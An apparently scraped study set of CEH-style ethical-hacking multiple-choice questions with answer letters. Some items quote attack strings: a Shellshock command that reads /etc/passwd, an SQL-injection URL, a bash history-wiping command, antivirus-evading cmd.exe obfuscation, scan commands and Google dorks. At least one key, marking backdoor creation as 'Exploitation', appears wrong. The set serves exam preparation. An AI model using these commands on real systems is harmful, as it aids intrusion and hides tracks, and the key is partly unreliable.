What is a "Collision attack" in cryptography? A. Collision attacks try to get the public key B. Collision attacks try to break the hash into three parts to get the plaintext value C. Collision attacks try to break the hash into two parts, with the same bytes in each part to get the private key D. Collision attacks try to find two inputs producing the same hash

D

What is one of the advantages of using both symmetric and asymmetric cryptography in SSL/TLS? A. Supporting both types of algorithms allows less-powerful devices such as mobile phones to use symmetric encryption instead. B. Symmetric algorithms such as AES provide a failsafe when asymmetric methods fail. C. Symmetric encryption allows the server to security transmit the session keys out-of-band. D. Asymmetric cryptography is computationally expensive in comparison. However, it is well-suited to securely negotiate keys for use with symmetric cryptography.

D

What is the minimum number of network connections in a multihomed firewall? A. 3 B. 5 C. 4 D. 2

D

What is the role of test automation in security testing? A. It is an option but it tends to be very expensive. B. It should be used exclusively. Manual testing is outdated because of low speed and possible test setup inconsistencies. C. Test automation is not usable in security due to the complexity of the tests. D. It can accelerate benchmark tests and repeat them with a consistent test setup. But it cannot replace manual testing completely.

D

What kind of detection techniques is being used in antivirus software that identifies malware by collecting data from multiple protected systems and instead of analyzing files locally it's made on the provider's environment? A. Behavioral based B. Heuristics based C. Honeypot based D. Cloud based

D

What piece of hardware on a computer's motherboard generates encryption keys and only releases a part of the key so that decrypting a disk on a new piece of hardware is NOT possible? A. CPU B. UEFI C. GPU D. TPM

D

Which hardware vulnerability allows programs to steal data that are currently processed on the computer? A Metasploit and Kali B Heartbleed and Shellshock C SAINT and SATAN D Meltdown and Spectre

D

Which injection tool was created to target Blind SQL attacks for MySQL/MariaDB only? A NoSQLMap B bsql Hacker C blind-sql-bitshifting D Blisqy

D

Which is the first step followed by Vulnerability Scanners for scanning a network? A. OS Detection B. Firewall detection C. TCP/UDP Port scanning D. Checking if the remote host is alive

D

Which method involves attackers bypassing client-ID security mechanisms and gaining access privileges, and then injecting malicious scripts into specific web pages? A Broken access control B Injection flaws C Cookie poisoning D Cross-Site Scripting (XSS)

D

Which method of password cracking takes the most time and effort? A. Dictionary attack B. Shoulder surfing C. Rainbow tables D. Brute force

D

Which of the following Bluetooth attacks is similar to the ICMP ping-of-death attack, where the attacker sends an oversized ping packet to a victim's device to cause a buffer overflow? A Bluesnarfing B Bluesniff C Bluejacking D Bluesmacking

D

Which of the following Google advanced search operators displays similar websites to the specified URL? A [site:] B [info:] C [inurl:] D [related:]

D

Which of the following IDS/firewall evasion techniques is used by an attacker to bypass Internet censors and evade certain IDS and firewall rules? A IP address decoy B Sending bad checksums C Source port manipulation D Anonymizers

D

Which of the following are computer programs designed to run on smartphones, tablets, and other devices? A Security applications B Malware C SMS applications D Mobile applications

D

Which of the following attack is performed during the translation of the SOAP message in the TLS layer, where attackers duplicate the body of the message and send it to the server as a legitimate user? A Cloud Cryptojacking B Side-Channel Attack C Man-in-the-Cloud Attack D Wrapping Attack

D

Which of the following attacks is performed by asking the appropriate questions to an application database, with multiple valid statements evaluated as true or false being supplied in the affected parameter in the HTTP request? A Heavy query B Error-based SQL injection C No error message returned D Boolean exploitation

D

Which of the following controls minimizes the consequences of an incident, probably by limiting the damage? A Deterrent B Detective C Preventive D Corrective

D

Which of the following controls strengthens the system against incidents, probably by minimizing or eliminating vulnerabilities? A Detective B Deterrent C Corrective D Preventive

D

Which of the following cryptography attacks is similar to the chosen plaintext attack, except that the attacker can obtain ciphertexts encrypted under two different keys? A Ciphertext-only attack B Known-plaintext attack C Chosen-key attack D Related-key attack

D

Which of the following encryption algorithm uses a 64-bit secret key, of which 56 bits are generated randomly, and the other 8 bits are used for error detection? A RC4 B Threefish C AES D DES

D

Which of the following encryption algorithms is a large tweakable symmetric-key block cipher with equal block and key sizes of 256, 512, or 1024 and involves only three operations, that is, addition-rotation-XOR? A RC4 B Twofish C RC5 D Threefish

D

Which of the following information security controls creates an appealing isolated environment for hackers to prevent them from compromising critical targets while simultaneously gathering information about the hacker? A. Botnet B. Intrusion detection system C. Firewall D. Honeypot

D

Which of the following is a mode of operation that includes EAP or RADIUS for centralized client authentication using multiple authentication methods, such as token cards, Kerberos, and certificates? A WPA3-Personal B WPA2-Personal C WPA3-Enterprise D WPA2-Enterprise

D

Which of the following is a simple form of attack that takes advantage of the fact that many programmers rely on hidden or fixed fields as the only security measure for certain operations? A Fragmentation B Unvalidated input C Application layering D Parameter tampering

D

Which of the following is an attack technique where the only information available to the attacker is some plaintext blocks along with the corresponding ciphertext and algorithm used to encrypt and decrypt the text? A Ciphertext-only attack B Adaptive chosen-plaintext attack C Chosen-plaintext attack D Known-plaintext attack

D

Which of the following is assured by the use of a hash? A. Authentication B. Confidentiality C. Availability D. Integrity

D

Which of the following is the structure designed to verify and authenticate the identity of individuals within the enterprise taking part in a data exchange? A. SOA B. biometrics C. single sign on D. PKI

D

Which of the following occur(s) when users (network administrators) improperly configure any of the critical security settings at any of the APs, potentially opening the entire network to vulnerabilities and attacks? A Ad-hoc associations B MAC spoofing C War driving D AP misconfiguration

D

Which of the following phases of risk management is an ongoing iterative process that assigns priorities for risk mitigation and implementation plans to help determine the quantitative and qualitative value of risk? A Risk identification B Risk treatment C Risk tracking and review D Risk assessment

D

Which of the following programming languages is most susceptible to buffer overflow attacks, due to its lack of a built-in bounds checking mechanism? Code: #include <string.h> int main(){ char buffer[8]; strcpy(buffer, "11111111111111111111111111111");} Output: Segmentation fault A. C# B. Python C. Java D. C++

D

Which of the following provides root access to the Apple iOS operating system and permits downloading of third-party applications, themes, and extensions that are unavailable through the official Apple App Store? A Sandboxing B Rooting C Exploiting D Jailbreaking

D

Which of the following refers to the data-transfer rate? A Radius B Hotspot C Advanced Encryption Standard D Bandwidth

D

Which of the following requires that both the sender and the receiver of the message possess the same encryption key? A Asymmetric encryption B Internet connection monitor C System integrity verifier D Symmetric encryption

D

Which of the following types of honeypot emulates the real production network of a target organization and causes attackers to devote their time and resources toward attacking the critical production system of the company? A Malware Honeypots B Honeynets C Spider Honeypots D Pure Honeypots

D

Which regulation defines security and privacy controls for Federal information systems and organizations? A. HIPAA B. EU Safe Harbor C. PCI-DSS D. NIST-800-53

D

Which results will be returned with the following Google search query? site:target.com -site:Marketing.target.com accounting A. Results from matches on the site marketing.target.com that are in the domain target.com but do not include the word accounting. B. Results matching all words in the query. C. Results for matches on target.com and Marketing.target.com that include the word "accounting" D. Results matching "accounting" in domain target.com but not on the site Marketing.target.com

D

Which service in a PKI will vouch for the identity of an individual or company? A. KDC B. CR C. CBC D. CA

D

Which technique can be used to bypass a firewall using domain name services? A DNS Serving B DNS Requesting C DNS Resolution D DNS Tunneling

D

Which tool is used for VoIP Enumeration? A Visio B SNMPc C Nmap D Svmap

D

Which tool is used for brute-forcing to discover subdomains, directories, and files? A John the Ripper B GameHack C Snort D GoBuster

D

Which type of attacks exhaust the bandwidth either within target network/service or between target network/service and the rest of the internet resulting in traffic blockage? A Fragmentation attacks B TCP state-exhaustion attacks C Application layer attacks D Volumetric attacks

D

Which type of protocol analyzer is designed for USB capture? A PRTG B Solarwinds C N2X Agilent D Voyager M4x

D

Which type of trojan is DreamBot classified as? A Remote Access B Backdoor C Point-of-Sale D E-banking

D

Which vulnerability allows an application to make requests to an arbitrary domain? A Denial-of-service attack (DDoS) B Man-in-the-middle attack (MitM) C Phishing D Server-side request forgery (SRF)

D

Which wireless tool performs rogue Wi-Fi AP and MitM attacks? A aLTEr B Aircrack C Ettercap D MANA Toolkit

D

White Hats are also known as ________, who use their hacking for defensive purposes. A Script Kiddies B Criminals C Hacktivists D Penetration Testers

D

Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems by sending malicious emails. For this purpose, he uses a tool to track the emails of the target and extracts information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources. He also checks if an email address was leaked using the haveibeenpwned.com API. Which of the following tools is used by Wilson in the above scenario? A. Factiva B. ZoomInfo C. Netcraft D. Infoga

D

You are a Network Security Officer. You have two machines. The first machine (192.168.0.99) has snort installed, and the second machine (192.168.0.150) has kiwi syslog installed. You perform a syn scan in your network, and you notice that kiwi syslog is NOT receiving the alert message from snort. You decide to run wireshark in the snort machine to check if the messages are going to the kiwi syslog machine. What Wireshark filter will show the connections from the snort machine to kiwi syslog machine? A. tcp.srcport= = 514 && ip.src= = 192.168.0.99 B. tcp.srcport= = 514 && ip.src= = 192.168.150 C. tcp.dstport= = 514 && ip.dst= = 192.168.0.99 D. tcp.dstport= = 514 && ip.dst= = 192.168.0.150

D

You are a penetration tester working to test the user awareness of the employees of the client XYZ. You harvested two employees' emails from some public sources and are creating a client-side backdoor to send it to the employees via email. Which stage of the cyber kill chain are you at? A. Reconnaissance B. Weaponization C. Command and control D. Exploitation

D

You just set up a security system in your network. In what kind of system would you find the following string of characters used as a rule within its configuration? alert tcp any any -> 192.168.100.0/24 21 (msg: ""FTP on the network!"";) A. A firewall IPTable B. FTP Server rule C. A Router IPTable D. An Intrusion Detection System

D

Your company performs penetration tests and security assessments for small and medium-sized business in the local area. During a routine security assessment, you discover information that suggests your client is involved with human trafficking. What should you do? A. Confront the client in a respectful manner and ask her about the data. B. Copy the data to removable media and keep it in case you need it. C. Ignore the data and continue the assessment until completed as agreed. D. Immediately stop work and contact the proper legal authorities.

D

________ are standalone malicious programs that replicate, execute, and spread across network connections independently, without human intervention. A Spikings B Spyware C Tracks D Worms

D

________ assessments are a type of security check that involve carrying out a configuration-level check through the command line. A Active B Internal C Passive D Host-based

D

________ gives the blueprint of the security profile for an organization, and should be undertaken in a methodological manner. A Networking B Forensics C Conceptualizing D Footprinting

D

________ implies access to enter into the building or secured area without the consent of an authorized person. A Shoulder surfing B Piggybacking C Sabotage D Tailgating

D

________ is NOT intended to compete with existing frameworks, as it is designed exclusively for web-based, open-source reconnaissance. A Email tracking B Maltego C Social engineering D Recon-ng

D

________ is a cloud-based service that gives you immediate, global visibility into where your IT systems might be vulnerable to the latest internet threats and how to protect them. A Nikto B Nessus Professional C OpenVAS D Qualys VM

D

________ is a procedure for identifying active hosts on a network, either to attack them or as a network security assessment. A Vulnerability scanning B Port scanning C Workstation scanning D Network scanning

D

________ is a totally non-technical process in which an attacker tricks a person and obtains confidential information in such a way that the target is unaware of the fact that someone is stealing confidential information. A Email tracking B Information tracking C Competitive intelligence D Social engineering

D

________ is a type of malware that attackers install on a computer to secretly gather information about its users without their knowledge and it hides itself from the user and can be difficult to detect. A Spiking B Hybrid attacking C Password guessing D Spyware

D

________ is a type of network protocol for port-based Network Access Control (PNAC), and its main purpose is to enforce access control at the point where a user joins the network. A Unidirectional Link Detection B Double Tagging C IPSec D IEEE 802.1X Suites

D

________ is a way to guarantee that the sender of a message cannot later deny having sent the message, and that the recipient cannot deny having received the message. A Confidentiality B Integrity C Authenticity D Non-repudiation

D

________ is legal in nature and conducted in order to evaluate the security of a target organization's IT infrastructure with their consent. ________ is the first step in ethical hacking, in which an attacker tries to gather information about a target. A Forensics examination / Conceptualizing B Forensics / Infrastructure consent C Networking / Conceptualizing D Ethical hacking / Footprinting

D

________ is necessary only to monitor messages exchanged on suspicious channels in which the users are engaged in illegal activity. A Covert interception B Trojan horse C Overt interception D Lawful interception

D

________ is one of the most serious consequences of an SQL-injection attack because attackers use SQL injection to obtain passwords from user-defined database tables. A Hashing B DBMS C Enumeration D Password grabbing

D

________ is the assurance that the information is accessible only to those authorized to have access. A Integrity B Availability C Authenticity D Confidentiality

D

________ is the greatest asset to an organization. A Policy B Personnel C Technology D Information

D

________ is trustworthiness of data or resources in the prevention of improper and unauthorized changes—the assurance that information is sufficiently accurate for its purpose. A Confidentiality B Availability C Authenticity D Integrity

D

________ refers to the process of testing the organization's security posture using similar techniques and tools as those of an attacker, but with the knowledge and approval of the organization. A Recon-ng B Maltego C Social engineering D Penetration testing (pen testing)

D

________ usually implies entry into the building or security area with consent of an authorized person. A Sabotage B Tailgating C Shoulder surfing D Piggybacking

D

env x=echo exploit bash cat/etc/passwd What is the Shellshock bash vulnerability attempting to do on a vulnerable Linux host? A. Removes the passwd file B. Changes all passwords in passwd C. Add new user to the passwd file D. Display passwd content to prompt

D

With ______________, the user is actively interacting with something on the webpage. There is an extra layer between the user and the desired action, and the user is tricked into executing whatever the extra layer entails. In ___________________, the web browser is doing things on the user's behalf.

clickjacking / cross-site request forgeries

Which of the following commands is used by an attacker to delete only the history of the current shell and retain the command history of other shells? A cat /dev/null> ~.bash_history && history -c && exit B history -w C export HISTSIZE=0 D history -c

B

Ray, a security professional in an organization, was instructed to identify all potential security weaknesses in the organization and fix them before an attacker can exploit them. In the process, he consulted a third-party consulting firm to run a security audit of the organization's network. Which of the following types of solutions did Ray implement in the above scenario? A Product-based solution B Service-based solution C Tree-based assessment D Inference-based assessment

B

What is the feature in FOCA that checks each domain to ascertain the host names configured in NS, MX, and SPF servers to discover the new host and domain names? A Common names B DNS search C Web search D Bing IP

B

When Jake, a software engineer, was using social media, he abruptly received a friend request from an unknown lady. Out of curiosity, he accepted it. She pretended to be nice and tricked Jake into revealing sensitive information about his organization. Once she obtained the information, she deactivated her account. Which of the following types of attack was performed on Jake in the above scenario? A Shoulder surfing B Honey trap C Diversion theft D Tailgating

B

Which of the following OS discovery techniques is used by an attacker to identify a target machine's OS by observing the TTL values in the acquired scan result? A OS discovery using Nmap B OS discovery using Unicornscan C OS discovery using Nmap Script Engine D OS discovery using IPv6 fingerprinting

B

Which of the following TCP communication flags notifies the transmission of a new sequence number and represents the establishment of a connection between two hosts? A FIN flag B SYN flag C PSH flag D RST flag

B

Which of the following commands is used by the SNMP manager continuously to retrieve all the data stored in an array or table? A GetResponse B GetNextRequest C GetRequest D SetRequest

B

In which of the following incident handling and response phases are the identified security incidents analyzed, validated, categorized, and prioritized? A Incident recording and assignment B Incident triage C Containment D Eradication

B

In which of the following security risks does an API accidentally expose internal variables or objects because of improper binding and filtering based on a whitelist, allowing attackers with unauthorized access to modify object properties? A Broken object-level authorization B Mass assignment C Improper assets management D Injection

B

In which of the following stages of the web server attack methodology does an attacker determine the web server's remote access capabilities, its ports and services, and other aspects of its security? A Information gathering B Web server footprinting C Website mirroring D Vulnerability scanning

B

Jaden, a security professional in an organization, introduced new tools and services into the organization. Before introducing the tools, he had to evaluate whether the tools are effective and appropriate for the organization. He used a publicly available and free-to-use list of standardized identifiers for software vulnerabilities and exposures to evaluate the tools. Which of the following databases did Jaden use to evaluate the tools and services? A LACNIC B CVE C Whois D ARIN

B

Karen, a security professional in an organization, performed a vulnerability assessment on the organization's network to check for vulnerabilities. In this process, she used a type of location data examination scanner that resides on a single machine but can scan several machines on the same network. Which of the following types of location and data examination tools did Karen use? A Network-based scanner B Agent-based scanner C Proxy scanner D Cluster scanner

B

Kate, a disgruntled ex-employee of an organization, decided to hinder the operations of the organization and gather sensitive information by injecting malware into the organization's network. Which of the following categories of insiders does Kate belong to? A Negligent insider B Malicious insider C Compromised insider D Professional insider

B

Larry, a professional hacker, was hired to launch a few attacks on an organization. In the process, he identified that FTP server ports are open and performed enumeration on FTP to find the software version and state of existing vulnerabilities for performing further exploitations. What is the FTP port number that Larry has targeted? A TCP 25 B TCP 20/21 C TCP/UDP 5060, 5061 D TCP 179

B

Morris, an attacker, has targeted an organization's network. To know the structure of the target network, he combined footprinting techniques with a network utility that helped him create diagrammatic representations of the target network. What is the network utility employed by Morris in the above scenario? A Netcraft B Tracert C Shodan D BuzzSumo

B

John, an attacker, performed sniffing on a target organization's network and found that one of the protocols used by the target organization is vulnerable as it allows a client to access and manipulate the emails on a server. John exploited that protocol to obtain the data and employee credentials that are transmitted in cleartext. Which of the following protocols was exploited by John in the above scenario? A IMAP B HTTPS C IPsec D DTLS

A

Jude, an attacker, has targeted an organization's communication network. While conducting initial footprinting, he used a Google dork to find the VoIP login portals of the organization. What is the Google dork that helped Jude find the VoIP login portals? A inurl:8080 intitle:"login" intext:"UserLogin" "English" B inurl:/voice/advanced/ intitle:Linksys SPA configuration C inurl:/remote/login?lang=en D !Host=*.* intext:enc_UserPassword=* ext:pcf

A

In one of the following types of identity theft, the perpetrator obtains information from different victims to create a new identity by stealing a social security number and uses it with a combination of fake names, date of birth, address, and other details required for creating a new identity. Which is this type of identity theft? A Social identity theft B Synthetic identity theft C Child identity theft D Medical identity theft

B

Santa, an attacker, targeted an organization's web infrastructure and sent partial HTTP requests to the target web server. When the partial requests were received, the web server opened multiple connections and waited for the requests to complete; however, these requests remained incomplete, causing the target server's maximum concurrent connection pool to be exhausted and additional connection attempts to be denied. Which of the following attack techniques was employed by Santa? A Slowloris attack B Ping-of-death (PoD) attack C Multi-vector attack D Smurf attack

A

Which of the following elements can be extracted using the query http://www.certifiedhacker.com/page.aspx?id=1 or 1=convert (int,(select top 1 name from sysobjects where xtype=char(85)))-- ? A 1st database table B 1st table column name C 1st field of the 1st row D Database name

A

Which of the following filters in Wireshark displays only the traffic in a LAN (192.168.x.x) between workstations and servers with no Internet? A ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16 B ip.src!= xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip C ip.addr==192.168.1.100 && tcp.port=23 D ip.addr == 10.0.0.4 or ip.addr == 10.0.0.5

A

Which of the following is a category of hackers who are also known as crackers, use their extraordinary computing skills for illegal or malicious purposes, and are often involved in criminal activities? A Black hats B White hats C Suicide hackers D Script kiddies

A

Which of the following is an evasion technique that involves replacing characters with their ASCII codes in hexadecimal form and prefixing each code point with the percent sign (%)? A URL encoding B Sophisticated matches C Null byte D Case variation

A

Which of the following scanning techniques is used by an attacker to send a TCP frame to a remote device with the FIN, URG, and PUSH flags set? A Xmas scan B TCP Maimon scan C ACK flag probe scan D IDLE/IPID header scan

A

Which of the following steganography techniques is used by attackers for hiding the message with a large amount of useless data and mixing the original data with the unused data in any order? A Null ciphers B Grille ciphers C Jargon codes D Semagrams

A

Which of the following techniques involves sending unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones and laptops? A Bluejacking B Bluesmacking C Bluebugging D BluePrinting

A

Which of the following techniques is also called a one-click attack or session riding and is used by an attacker to exploit a victim's active session with a trusted site to perform malicious activities? A Cross-site request forgery attack B Cross-site script attack C Session replay attacks D Session fixation

A

Which of the following techniques is used by an attacker to perform automated searches on the target website and collect specified information, such as employee names and email addresses? A Web spidering B Website mirroring C Monitoring of web updates D Website link extraction

A

Which of the following tools in OSRFramework is used by attackers to check for a user profile on up to 290 different platforms? A usufy.py B phonefy.py C entify.py D searchfy.py

A

Clark is a professional hacker. He targeted an organization for financial benefit and used various footprinting techniques to gather information about the target network. In this process, he employed a protocol used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system. What is the protocol employed by Clark in the above scenario? A SMB B Whois C SNMP D FTP

B

George hired an attacker named Joan to perform a few attacks on a competitor organization and gather sensitive information. In this process, Joan performed enumeration activities on the target organization's systems to access the directory listings within Active Directory. What is the type of enumeration that Joan has performed in the above scenario? A SNMP enumeration B LDAP enumeration C NTP enumeration D NetBIOS enumeration

B

Given below are the different phases of the APT lifecycle. 1) Initial intrusion 2) Persistence 3) Preparation 4) Cleanup 5) Expansion 6) Search and exfiltration What is the correct sequence of phases in the APT lifecycle? A 1 → 2 → 3 → 4 → 5 → 6 B 3 → 1 → 5 → 2 → 6 → 4 C 5 → 3 → 2 → 6 → 4 → 1 D 2 → 4 → 6 → 1 → 5 → 3

B

Identify the fileless malware obfuscation technique in which an attacker uses the below command to bypass antivirus software. cmd.exe /c ((echo command1)&&(echo command2)) A Inserting characters B Inserting parentheses C Inserting double quotes D Custom environment variables

B

Which of the following firewalls works at the session layer of the OSI model or TCP layer of TCP/IP, forwards data between networks without verification, and blocks incoming packets from the host but allows traffic to pass through? A Packet filtering firewall B Circuit-level gateway firewall C Application-level firewall D Application proxy

B

Which of the following information security elements guarantees that the sender of a message cannot later deny having sent the message and the recipient cannot deny having received the message? A Confidentiality B Non-repudiation C Availability D Integrity

B

Which of the following is a process that can be used to convert object data into a linear format for transportation to a different system or different network? A Deserialization B Serialization C Insecure deserialization D Directory traversal

B

Which of the following types of malware remains dormant until the user performs an online financial transaction, replicates itself on the computer, and edits the registry entries each time the computer starts? A TAN grabber B Covert credential grabber C HTML injection D Form grabber

B

Which of the following types of viruses infects Microsoft Word or similar applications by automatically performing a sequence of actions after triggering an application? A Multipartite viruses B Macro viruses C Encryption viruses D Sparse infector viruses

B

Which of the following types of vulnerability assessment sniffs the traffic present on the network to identify the active systems, network services, applications, and vulnerabilities? A Active assessment B Passive assessment C Credentialed assessment D Distributed assessment

B

Which of the following web services is designed to make services more productive and uses many underlying HTTP concepts to define the services? A SOAP B RESTful C XML-RPC D JSON-RPC

B

Which of the following web-server components is located between the web client and web server to pass all the requests and is also used to prevent IP blocking and maintain anonymity? A Server root B Web proxy C Virtual document tree D Virtual hosting

B

A phase of the cyber kill chain methodology triggers the adversary's malicious code, which utilizes a vulnerability in the operating system, application, or server on a target system. At this stage, the organization may face threats such as authentication and authorization attacks, arbitrary code execution, physical security threats, and security misconfiguration. Which is this phase of the cyber kill chain methodology? A Reconnaissance B Weaponization C Exploitation D Installation

C

Ben, an ethical hacker, was hired by an organization to check its security levels. In the process, Ben examined the network from a hacker's perspective to identify exploits and vulnerabilities accessible to the outside world by using devices such as firewalls, routers, and servers. Which of the following types of vulnerability assessment did Ben perform on the organization? A Active assessment B Passive assessment C External assessment D Internal assessment

C

CenSys Solutions hired Clark, a security professional, to enhance the Internet security of the organization. To achieve the goal, Clark employed a tool that provides various Internet security services, including anti-fraud and anti-phishing services, application testing, and PCI scanning. What is the tool used by Clark to perform the above activities? A Blisqy B OmniPeek C Netcraft D BTCrawler

C

David, a content writer, was searching online for a specific topic. He visited a web page that appears legitimate and downloaded a file. As soon as he downloaded the file, his laptop started to behave in a weird manner. Out of suspicion, he scanned the laptop for viruses but found nothing. Which of the following programs conceals the malicious code of malware via various techniques, making it difficult for security mechanisms to detect or remove it? A Exploit B Downloader C Obfuscator D Payload

C

Edward, a security professional in an organization, was instructed by higher officials to calculate the severity of the organization' s systems.In the process, he used CVSS, a published standard that provides an open framework for communicating the characteristics and impacts of IT vulnerabilities. He used three metrics provided by CVSS for measuring vulnerabilities. Which of the following CVSS metrics represents the features that continue to change during the lifetime of the vulnerability? A Base metric B Environmental metric C Temporal metric D Overall score

C

Given below are the different phases of the vulnerability management lifecycle. 1) Monitor 2) Vulnerability scan 3) Identify assets and create a baseline 4) Risk assessment 5) Verification 6) Remediation What is the correct sequence of phases involved in the vulnerability management lifecycle? A 1 → 2 → 3 → 4 → 5 → 6 B 2 → 1 → 5 → 3 → 6 → 4 C 3 → 2 → 4 → 6 → 5 → 1 D 3 → 1 → 4 → 5 → 6 → 2

C

Given below are the steps involved in automated patch management. a. Test b. Assess c. Detect d. Acquire e. Maintain f. Deploy What is the correct sequence of steps involved in automatic patch management? A c → b → a → d → f → e B b → c → d → a → f → e C c → b → d → a → f → e D a → c → b → e → f → d

C

In one of the following social engineering techniques, an attacker assumes the role of a knowledgeable professional so that the organization's employees ask them for information. The attacker then manipulates questions to draw out the required information. Which is this technique? A Baiting B Quid pro quo C Reverse social engineering D Dumpster diving

C

In which of the following attack types does an attacker exploit vulnerabilities that evolve from the unsafe use of functions in an application in public web servers to send crafted requests to internal or backend servers? A SSH brute forcing B Web-server password cracking C Server-side request forgery D Web-server misconfiguration

C

In which of the following attack types does an attacker modify the content of a web page by examining its HTML code and identifying form fields that lack valid constraints? A Directory traversal B Buffer overflow attack C Command injection attack D Cross-site scripting (XSS) attack

C

In which of the following attack types does an attacker use compromised PCs with spoofed IP addresses to intensify DDoS attacks on the victims' DNS server by exploiting the DNS recursive method? A DoS/DDoS attack B DNS server hijacking C DNS amplification attack D Directory traversal attack

C

In which of the following techniques does an attacker use a combination of upper- and lower-case letters in an XSS payload to bypass the WAF? A Using hex encoding to bypass the WAF B Using ASCII values to bypass the WAF C Using obfuscation to bypass the WAF D Using ICMP tunneling

C

In which of the following web application threats does an attacker manipulate the variables that reference files with "dot-dot-slash (../)" sequences and its variations? A Unvalidated redirects and forwards B Hidden field manipulation attack C Directory traversal attack D Cookie/session poisoning

C

Jim, a professional hacker, was hired to perform an attack on an organization. In the attack process, Jim targeted the SMTP server of the target organization and performed SMTP enumeration using the smtp-user-enum tool. He used some options in the tool to gather the usernames of the target organization's employees. Which of the following options did Jim use in the SMTP command for guessing the username from among EXPN, VRFY, and RCPT TO? A -m n B -u user C -M mode D -p port

C

John, a professional hacker, has launched an attack on a target organization to extract sensitive information. He was successful in launching the attack and gathering the required information. He is now attempting to hide the malicious acts by overwriting the server, system, and application logs to avoid suspicion. Which of the following phases of hacking is John currently in? A Maintaining access B Scanning C Clearing tracks D Gaining access

C

Which of the following DNS poisoning techniques is used by an attacker to infect a victim's machine with a Trojan and remotely change their DNS IP address to that of the attacker's? A DNS cache poisoning B Proxy server DNS poisoning C Internet DNS spoofing D Intranet DNS spoofing

C

Which of the following attacks runs malicious code inside a browser and causes an infection that persists even after closing or browsing away from the malicious web page that spread the infection? A Clickjacking attack B DNS rebinding attack C MarioNet attack D XML poisoning

C

Which of the following countermeasures should be followed to safeguard the privacy, data, and reputation of an organization and to prevent information disclosure? A Keeping the domain name profile public B Enabling directory listings in the web servers C Avoiding domain-level cross-linking for critical assets D Turning on geolocation access on all mobile devices

C

Which of the following encoding schemes represents any binary data using only printable ASCII characters and is used for encoding email attachments for safe transmission over SMTP? A URL encoding B Unicode encoding C Base64 encoding D Hex encoding

C

Which of the following hping commands is used by an attacker to scan the entire subnet to detect live hosts in a target network? A hping3 -8 50-60 -S 10.0.0.25 -V B hping3 -F -P -U 10.0.0.25 -p 80 C hping3 -1 10.0.1.x --rand-dest -I eth0 D hping3 -9 HTTP -I eth0

C

Which of the following information is exploited by an attacker to perform a buffer overflow attack on a target web application? A Cleartext communication B Error message C Application code D Email interaction

C

Which of the following is a technique used by an attacker to gather valuable system-level data such as account details, OS, software version, server names, and database schema details? A Whois B Session hijacking C Web server footprinting D Vulnerability scanning

C

Which of the following is an IDS evasion technique used by attackers to encode an attack packet payload in such a manner that the destination host can decode the packet but not the IDS? A Evasion B Session splicing C Obfuscating D Fragmentation

C

Which of the following modules establishes a communication channel between the Metasploit framework and a victim host? A Exploit module B Auxiliary module C Payload module D NOPS module

C

Which of the following protocols uses AES and the Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) for wireless data encryption? A WEP B WPA3 C WPA2 D WPA

C

Which of the following regular expressions helps security professionals detect zero or more alphanumeric and underscore characters involved in an attack? A /(\')|(\%27)|(\-\-)|(#)|(\%23)/ix B /exec(\s|\+)+(s|x)p\w+/ix C /\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix D /((\%3D)|(=))[^ ]*((\%27)|(\')|(\-\-)|(\%3B)|(;))/ix

C

Which of the following risk management phases involves selecting and implementing appropriate controls for the identified risks to modify them? A Risk tracking and review B Risk identification C Risk treatment D Risk assessment

C

A certain scanning technique has no three-way handshake, and the system does not respond when the port is open; when the port is closed, the system responds with an ICMP port unreachable message. Which of the following is this scanning technique? A List scanning B SCTP COOKIE ECHO scanning C IPv6 scanning D UDP scanning

D

A certain type of port scanning technique is similar to the TCP SYN scan and can be performed quickly by scanning thousands of ports per second on a fast network that is not obstructed by a firewall, offering a strong sense of security. Which of the following is this type of port scanning technique? A IDLE/IPID header scanning B SCTP COOKIE ECHO scanning C SSDP scanning D SCTP INIT scanning

D

An attacker aims to hack an organization and gather sensitive information. In this process, they lure an employee of the organization into clicking on a fake link, which appears legitimate but redirects the user to the attacker's server. The attacker then forwards the request to the legitimate server on behalf of the victim. Which of the following types of attack is performed by the attacker in the above scenario? A Man-in-the-middle attack B Cross-site script attack C Session replay attack D Session hijacking using proxy servers

D

An attacker performed OS banner grabbing on a target host. They analyzed the packets received from the target system and identified that the values of time to live (TTL) and TCP window size as 255 and 4128, respectively. What is the operating system of the target host on which the attacker performed banner grabbing? A Linux (Kernel 2.4 and 2.6) B Google Linux C Windows 98, Vista, and 7 (Server 2008) D iOS 12.4 (Cisco Routers)

D

Clark, an ethical hacker, is performing vulnerability assessment on an organization's network. Instead of performing footprinting and network scanning, he used tools such as Nessus and Qualys for the assessment. Which of the following types of vulnerability assessment did Clark perform on the organization? A Manual assessment B Credentialed assessment C Distributed assessment D Automated assessment

D

In which of the following attacks does an attacker obtain the user session ID and then reuse it to gain unauthorized access to a target user account? A Session token prediction B Session token tampering C Session hijacking D Session replay

D

In which of the following phases of social engineering attacks does an attacker collect sensitive information about the organization's accounts, finance, technologies in use, and upcoming plans? A Research the target company B Select a target C Develop a relationship D Exploit the relationship

D

Jack, a security professional, was instructed to introduce a security standard to handle cardholder information for major debit, credit, prepaid, e-purse, ATM, and POS cards. In the process, Jack has employed a standard that offers robust and comprehensive standards as well as supporting materials to enhance payment-card data security. What is the security standard that Jack has employed? A HIPAA B SOX C DMCA D PCI DSS

D

Joan, a professional hacker, was hired to retrieve sensitive information from a target organization. In this process, she used a post-exploitation tool to check common misconfigurations and find a way to escalate privileges. Which of the following tools helps Joan in escalating privileges? A ShellPhish B GFI LanGuard C Netcraft D BeRoot

D

Through which of the following techniques can an attacker obtain a computer's IP address, alter the packet headers, and send request packets to a target machine while pretending to be a legitimate host? A IP address decoy B Source port manipulation C Packet fragmentation D IP address spoofing

D

Which of the following commands is used by an attacker to perform an ICMP ECHO ping sweep that can determine the live hosts from a range of IP addresses by sending ICMP ECHO requests to multiple hosts? A nmap -sn -PR 10.10.10.10 B nmap -sn -PU 10.10.10.10 C nmap -sn -PE 10.10.10.10 D nmap -sn -PE 10.10.10.5-15

D

Which of the following techniques scans the headers of IP packets leaving a network and ensures that unauthorized or malicious traffic never leaves the internal network? A Ingress filtering B TCP intercept C Rate limiting D Egress filtering

D


Ensembles d'études connexes

